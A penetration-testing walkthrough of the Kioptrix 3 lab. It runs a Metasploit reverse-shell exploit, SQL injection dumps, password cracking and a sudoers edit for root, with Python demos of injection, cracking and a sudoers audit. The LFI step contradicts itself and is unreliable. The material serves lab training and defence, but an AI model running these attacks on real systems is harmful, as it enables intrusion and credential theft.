netdiscover -r 192.168.0.0/24
nmap -sS -T4 -oA kioptrix3 192.168.0.3
(-oA takes an output basename before the target: this writes kioptrix3.nmap, kioptrix3.gnmap and kioptrix3.xml.)
nikto -host 192.168.0.3 -port 80 -output nikto.html
searchsploit -w lotuscms
The LotusCMS result is a remote code execution bug (PHP code injected through the page parameter reaches an eval() call in LotusCMS 3.0), so it can be exploited with the Metasploit module, with a netcat listener catching a reverse shell, or by hand.
msfconsole
search lotuscms
use exploit/multi/http/lcms_php_exec
set RHOST 192.168.0.3    (the Kioptrix 3 IP address)
set RPORT 80
set URI /    (LotusCMS sits at the web root, as nmap and nikto showed)
set LPORT <local port>    (the port on the Kali box that the reverse shell connects back to)
run
This returns a low-privilege shell on the target: /etc/passwd is readable, /etc/shadow is not.
Next I looked through the users' home directories.
/home/dreg held nothing of interest. /home/loneferret, however, turned up two useful things.
A CompanyPolicy.README file states that loneferret may run the ht editor via sudo.
The web application config /home/www/kioptrix3.com/gallery/gconfig.php contains hard-coded root credentials for the gallery database (password fucyeyou).
Next, I launched a browser and pointed it at phpMyAdmin on the system's IP address (http://192.168.0.3/phpmyadmin), logging in with the credentials from gconfig.php.
Exploring the database application showed three databases:
gallery
information_schema
mysql
The gallery database contains a table called dev_accounts holding a username and a password hash per row.
Since the site is written in PHP, I also tested whether the index.php parameter was sanitized by appending ../../../../../etc/passwd directly after the = sign in the URL.
Unfortunately, I did not receive any results, so I turned to the Internet to research PHP LFI vulnerabilities. The OWASP "Testing for Local File Inclusion" guide notes that when the script appends its own suffix to the supplied path, a null-byte terminator (%00) may be needed to mark the end of the string so that the appended suffix is ignored.
So I re-entered ../../../../../etc/passwd with jpg added to the end of the string, the technique suggested within the OWASP article:
http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml
For the gallery pages to render properly, the attacking system needs an /etc/hosts entry mapping kioptrix3.com to 192.168.0.3; otherwise the page's references to kioptrix3.com go out to the Internet and the image files do not load.
I then ran sqlmap against the gallery pages. The first targets had no injectable parameter:
sqlmap -u http://192.168.0.3/gallery/index.php
sqlmap -u http://192.168.0.3/gallery/recent.php
sqlmap -u http://192.168.0.3/gallery/g.php/1
The id parameter of gallery.php is injectable, and the following sequence enumerates the databases, lists the tables in gallery, dumps dev_accounts (usernames and password hashes) and finally the MySQL user table. The URL is quoted so the shell does not treat & as a background operator, and the #photos fragment is left off because a browser never sends it to the server:
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid" --dbs
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid" -D gallery --tables
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid" -D gallery -T dev_accounts --dump
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid" -D mysql -T user -C host,user,password --dump
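To make concrete what sqlmap is exploiting in gallery.php?id=, here is an added example (not code from this page or from the Kioptrix gallery application) that rebuilds the pattern in Python against an in-memory SQLite database. The table and column names (photos looked up by id, dev_accounts with username and password) follow the walkthrough; the schema, rows, function names and the two sample accounts are all assumed for the demonstration. The vulnerable lookup pastes the id parameter into the SQL text, so a UNION payload pulls dev_accounts through the photo query, which is what --dump automates; the hardened lookup rejects anything that is not an integer and binds the value as a parameter.

```python
import hashlib
import sqlite3
from typing import List, Tuple


def md5_hex(s: str) -> str:
    """Unsalted MD5, the format hashcat -m 0 cracks later in the walkthrough."""
    return hashlib.md5(s.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample data, not the real Kioptrix 3 database.

    Table and column names follow the walkthrough; the rows are made up.
    """
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE photos (photoid INTEGER PRIMARY KEY, filename TEXT);
        CREATE TABLE dev_accounts (username TEXT, password TEXT);
        INSERT INTO photos VALUES (1, 'cat.jpg'), (2, 'dog.jpg');
        """
    )
    for user, pw in (("alice", "Summer2012"), ("bob", "letmein")):
        con.execute("INSERT INTO dev_accounts VALUES (?, ?)", (user, md5_hex(pw)))
    return con


def vulnerable_lookup(con: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """The bug sqlmap found: the raw id parameter is pasted into the SQL text."""
    sql = f"SELECT photoid, filename FROM photos WHERE photoid = {id_param}"
    return con.execute(sql).fetchall()


def hardened_lookup(con: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Fix: reject anything that is not an integer, then bind it as a parameter
    so the database engine never parses attacker-supplied text as SQL."""
    try:
        photo_id = int(id_param)
    except ValueError:
        raise ValueError(f"rejected non-integer id: {id_param!r}") from None
    sql = "SELECT photoid, filename FROM photos WHERE photoid = ?"
    return con.execute(sql, (photo_id,)).fetchall()


# What sqlmap's --dump boils down to for gallery.php?id=: a UNION with the same
# column count as the photo row, so every dev_accounts row rides along with it.
UNION_PAYLOAD = "1 UNION SELECT username, password FROM dev_accounts"

if __name__ == "__main__":
    con = build_db()
    for row in vulnerable_lookup(con, UNION_PAYLOAD):
        print("vulnerable:", row)
    try:
        hardened_lookup(con, UNION_PAYLOAD)
    except ValueError as err:
        print("hardened  :", err)
```

The same UNION technique is how sqlmap reached the mysql.user table: once one query concatenates input, every table the database account can read is exposed, which is why the hard-coded root credentials in gconfig.php made the injection so much worse.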
Having the usernames from /etc/passwd and now the usernames and password hashes from phpMyAdmin, I had enough to recover the credentials with a password cracker. I used two approaches: Hydra online against SSH, and hashcat offline against the hashes.
Method 1: Hydra
I created a text file named users containing the loneferret and dreg usernames, then launched Hydra for an online brute force against the Kioptrix SSH service with the following parameters:
· -L = login (username) file
· -P = password file
· ssh = the service module to attack (SSH on its default port 22)
· -e nsr = also try n: a null password, s: the login as the password, and r: the login reversed
· -f = exit after the first login/password pair is found
· -t 4 = number of parallel connection tasks
hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4
Method 2: hashcat
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force
(-m 0 selects raw MD5, the format of the dev_accounts hashes; -a 0 is a straight dictionary attack; --force skips hashcat's driver and hardware warnings.)
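Both cracking steps rest on the same idea, a candidate list tried against each account, so here is one added Python example (not the page's code, nor Hydra's or hashcat's) covering both: it generates the extra guesses Hydra's -e nsr adds (empty password, the login itself, the login reversed) ahead of a word list, then does offline what hashcat -m 0 -a 0 does, hashing each candidate with unsalted MD5 and comparing against the dumped digests. The account names, hashes and word list below are constructed with hashlib for the demonstration and are not the dev_accounts contents; the function names are assumed.

```python
import hashlib
from typing import Dict, Iterable, Iterator, List, Optional


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def hydra_e_nsr(login: str) -> Iterator[str]:
    """The three extra guesses Hydra's -e nsr adds for each login:
    n = null (empty) password, s = the login itself, r = the login reversed."""
    yield ""
    yield login
    yield login[::-1]


def crack_md5(targets: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Offline dictionary attack on unsalted MD5, the hashcat -m 0 -a 0 case.

    targets maps login -> hex digest (as dumped from dev_accounts).
    Returns login -> recovered password, or None if nothing matched.
    """
    found: Dict[str, str] = {}
    # Digests still to crack. Without a salt several logins may share one
    # digest, so each digest maps to a list of logins.
    pending: Dict[str, List[str]] = {}
    for login, digest in targets.items():
        digest = digest.lower()
        # Cheap per-account guesses first (the -e nsr set).
        for pw in hydra_e_nsr(login):
            if md5_hex(pw) == digest:
                found[login] = pw
                break
        else:
            pending.setdefault(digest, []).append(login)
    # With no salt every word is hashed exactly once and checked against all
    # remaining accounts at the same time. This is why rockyou against raw MD5
    # finishes in seconds, whereas a salted, slow hash costs one full
    # computation per account per guess.
    for word in wordlist:
        if not pending:
            break
        for login in pending.pop(md5_hex(word), []):
            found[login] = word
    return {login: found.get(login) for login in targets}


# Constructed sample: these are NOT the dev_accounts hashes from the target.
SAMPLE_HASHES = {
    "loneferret": md5_hex("starwars"),      # recovered from the word list
    "dreg": md5_hex("gerd"),                # recovered via -e r (reversed login)
    "guest": md5_hex("password"),           # shares a digest with "www": one check cracks both
    "www": md5_hex("password"),
    "admin": md5_hex("correct horse battery staple"),  # not guessable with this list
}
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "starwars", "letmein"]

if __name__ == "__main__":
    for login, pw in crack_md5(SAMPLE_HASHES, SAMPLE_WORDLIST).items():
        print(f"{login:12} {pw if pw is not None else '<not cracked>'}")
```

The offline route is the one to prefer when hashes are already in hand: Hydra's SSH guessing is rate-limited by the network and shows up in auth.log, while the hash comparison above runs silently at memory speed.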
With loneferret's password recovered as starwars:
ssh loneferret@192.168.0.3
sudo -l
This confirms that loneferret may run /usr/local/bin/ht as root. Running ht over the SSH session first failed with an error about the xterm-256color terminal type; exporting TERM=xterm before launching it works around the error:
export TERM=xterm
sudo ht
Because ht runs as root it can open and save any file. Open /etc/sudoers and carefully update loneferret's entry: add ,/bin/sh directly after /usr/local/bin/ht, with the comma separating the two permitted commands.
Save and exit, then:
sudo /bin/sh
you have root access!!
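The root of this escalation is that any program in a sudo rule which can open and write arbitrary files (an editor such as ht, vi or nano, a pager that can shell out, or a shell itself) is equivalent to granting root outright, because it can rewrite /etc/sudoers exactly as done above. As an added example, not the page's or Kioptrix's code, here is a small Python audit that parses sudoers-style rules and flags such commands. The sample sudoers text is constructed to resemble the situation in the walkthrough (loneferret permitted to run /usr/local/bin/ht with su denied); the list of root-equivalent binaries is my own short selection and the function names are assumed.

```python
import re
from dataclasses import dataclass
from typing import List

# Programs that can read or write arbitrary files or spawn a shell when run as
# root. Granting any of them via sudo is granting root. Assumed, short list.
ROOT_EQUIVALENT = {
    "ht", "vi", "vim", "nano", "emacs", "less", "more", "man",
    "sh", "bash", "dash", "zsh", "python", "perl", "find", "awk",
}
TAGS = ("NOPASSWD:", "PASSWD:", "NOEXEC:", "EXEC:", "SETENV:", "NOSETENV:")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


@dataclass
class Finding:
    user: str
    command: str
    reason: str


def strip_tags(cmd: str) -> str:
    """Remove leading tag specifiers such as NOPASSWD: or SETENV: from a command."""
    stripped = True
    while stripped:
        stripped = False
        for tag in TAGS:
            if cmd.startswith(tag):
                cmd = cmd[len(tag):].lstrip()
                stripped = True
    return cmd


def audit_sudoers(text: str) -> List[Finding]:
    """Flag user specifications whose permitted commands are root-equivalent.

    Handles the common 'user host = (runas) [TAG:] cmd, cmd' form, negated
    (!) entries and ALL; aliases and Defaults lines are skipped.
    """
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        if "=" not in line:
            continue
        lhs, rhs = line.split("=", 1)
        user = lhs.split()[0]
        for part in rhs.split(","):
            cmd = re.sub(r"^\([^)]*\)\s*", "", part.strip())  # drop (runas) list
            cmd = strip_tags(cmd)
            if not cmd or cmd.startswith("!"):
                continue  # empty, or a negated (denied) command
            if cmd == "ALL":
                findings.append(Finding(user, cmd, "ALL: every command may run as root"))
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if prog in ROOT_EQUIVALENT:
                findings.append(Finding(
                    user, cmd, f"{prog} can rewrite /etc/sudoers or spawn a shell as root"))
    return findings


# Constructed sample, not the real Kioptrix 3 /etc/sudoers.
SAMPLE_SUDOERS = """
# constructed sample
Defaults        env_reset
root            ALL=(ALL) ALL
%admin          ALL=(ALL) ALL
loneferret      ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg            ALL=(ALL) NOPASSWD: /usr/bin/apt-get update, /bin/ls
backup          ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.user:12} {f.command:40} {f.reason}")
```

Note that the !/usr/bin/su negation in the sample does nothing useful: denying su while allowing an editor still leaves a one-edit path to root. The fix is to grant the narrowest thing the user actually needs, for example sudoedit on one named file or a wrapper script with fixed arguments, never a general-purpose editor.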